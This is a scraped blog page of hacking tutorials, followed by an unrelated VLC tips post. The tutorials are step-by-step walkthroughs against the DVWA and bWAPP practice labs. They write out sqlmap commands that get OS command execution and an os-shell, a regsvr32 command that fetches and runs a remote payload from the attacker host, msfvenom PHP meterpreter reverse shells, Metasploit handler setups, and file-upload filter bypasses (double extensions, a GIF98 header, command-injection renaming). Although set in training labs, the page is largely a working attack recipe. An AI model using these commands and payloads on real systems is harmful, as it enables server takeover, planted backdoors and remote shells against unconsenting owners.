Showing posts with label Best of Hacking. Show all posts
Showing posts with label Best of Hacking. Show all posts

Command Injection Exploitation through SQL Injection using Sqlmap in DVWA

In this article we will see how to perform command injection using sqlmap and try to execute any cmd command through sqlmap if web server is having sql vulnerability.

Requirement:
Xampp/Wamp Server                                                                                                           
DVWA Lab
Kali Linux: Burp suite, sqlmap tool             

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here
Now open the DVWA in your pc and login with following credentials:
Username – admin
Password – password

Click on DVWA Security and set Website Security Level low


From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  


Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.


Lets enumerate all databases name using “refrere and cookies” under sqlmap command.
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2 ″  –dbs


Notice the image given below it has dumped all names of database. Now we are going to choose  dvwa for command injection attack.


Now open another terminal for metasploit framework and Type msfconsole.

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).
 Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit

Above module will generate a malicious code as dll file. Copy the selected part for dll file and then run this malicious code using sqlmap comand.


Now we’re going to execute dll file through CMD command using sqlmap therefore paste above malicious code in sqlmap command as shown in the image given below.

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” –cookie=” security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2 ″  -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"


Then type4 for php payload and type 1 for common location to upload payload as backdoor in victim PC.


As soon as the command will execute come back to metasploit framework and you will get meterpreter session 1 opened.
Type sessions –I 1
Meterpreter>sysinfo

Shell uploading through sql Injection using Sqmap in bWAPP

Multiple times you people have used sqlmap for sql injection to get database of web server. Here in this tutorial I will show you how to upload any backdoor if the website is suffering from sql vulnerability.

Requirement:
Xampp/Wamp Server
bWAPP Lab

Kali Linux: Burp suite, sqlmap tool

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here
Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.


Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.


Type any movie name like thor in the text field and just after that start the burp suite in kali Linux.


To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click on search. Burp suit will provide cookie and referer under fetched data which will later use in sqlmap commands.


Now Type following command to run sqlmap to access os-shell of web server.

sqlmap -u "http://192.168.0.102:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie=" PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D bwapp --os-shell




Above command will try to generate a backdoor; I want to send PHP backdoor in target pc therefore type 4 for PHP payload and then Type 1 for common location to use as writable directory to upload it.


At present it is trying to upload the file on “C: /xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “C: /xampp/htdocs/”and you will get os-shell of victim pc. But here it also showing the path where you can manually upload your backdoor, look at over highlighted URL:
http://192.168.0.102/tmpuuddt.php


I am more interested in meterpreter shell so let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. Copy the code from 

Now load metasploit framework by typing msfconsole and start multi/handler


Explore the URL: http://192.168.0.102/tmpuuddt.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server and will later upload that backdoor to following directory (“C: /xampp/htdocs/” )of web server.

Click on browse to select your shell.php file and then click on upload.

GREAT!!!  Our backdoor shell.php File uploaded.

To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.


msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo

Lovely!!! I have my meterpreter session on my kali Linux.

Hack File upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is '.jpg' or '.jpeg' or ’.png’ before allowing the image get uploaded in directory.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, metasploit framework

Install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin
Password – password

Bypass Low Level Security


Click on DVWA Security and set Website Security Level low


Open terminal in kali linux and create php backdoor through following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.


Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.


After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.
hackable/uploads/hack.php


Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo


Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium


Same process to create php backdoor.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.


Come back to your DVWA lab and click to file upload option from vulnerability menu.
Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab.  Don’t forget to set manual proxy of your browser and click on upload.


Intercept tab will work to catch post method when you click to upload button.  Now convert raj.php.jpeg into raj.php


Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory


This will show the path of uploaded file of the directory where file is successfully uploaded.
hackable/uploads/raj.php


Now repeat the whole process same as in low security to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php


This’ll provide a meterpreter session 2 when you run URL in browser.

meterpreter > sysinfo


Bypass High Level Security

Click on DVWA Security and set Website Security Level High


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw


Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.


Repeat the process to browse shell.jpeg


Again you will directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php


Now repeat the process to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php


Wonderful!! Here we get meterpreter session 3 also.
meterpreter > sysinfo

Best of VLC Media Player Tricks (Part 2)

How to Play Multiple Video in VLC

Open the VLC media player.
Go to the Tool Tab present in the menu bar of the media player, and then select Preferences.


Open the Interface Settings then select Allow only one instance from Instances and then save.


Now you can enqueue any number of items in the playlist and keep playing the current item.The items will be played in the regular succession without gap as stored in the playlist.

How to Add Your Images and Text in VLC
Open the VLC Media Player
Select Effects and Filters from the Tool Tab present in the menu bar of the Media Player.


Now go to Video effects > Overlay,

(a) Select Add logo to add the desired image in the VLC Media Player, Browse the image from (. . .) and adjust its transparency level and position on the screen.

(b) Select Add text; enter the text you want to provide and also its position.


We can see the image and text entered in the selected position while playing the video.


How to Rotate Video using VLC
Open the VLC Media Player
Go to the Menu Bar; select Tools > Effects and Filters.


Now go to Video Effects > Geometry, select Transform and Rotate and adjust the Angle of Rotation.


Now we will get the rotated video as per the angle of rotation similar to the given below.



How to Extract Audio Track from DVD
Play the DVD in the VLC Media Player.


Now the DVD will start playing in the VLC Media Player. Suppose we have to extract the audio track of Jaws 3, this particular movie is positioned at 3.


 Go to the Menu Bar; select Media > Convert/Save.


Open the Disc option, enter the title number i.e the number at which that particular video is located, then select Convert/Save.


Browse the Destination file, change the Profile Settings i.e Audio-MP3 and then select Start.


It will start extracting the Audio Track of that particular video.

AUTHOR-This article is written by NUPUR KUMARI who is perusing Bachelor’s degree in Information Technology from Bhopal. She has the interest in Web Security.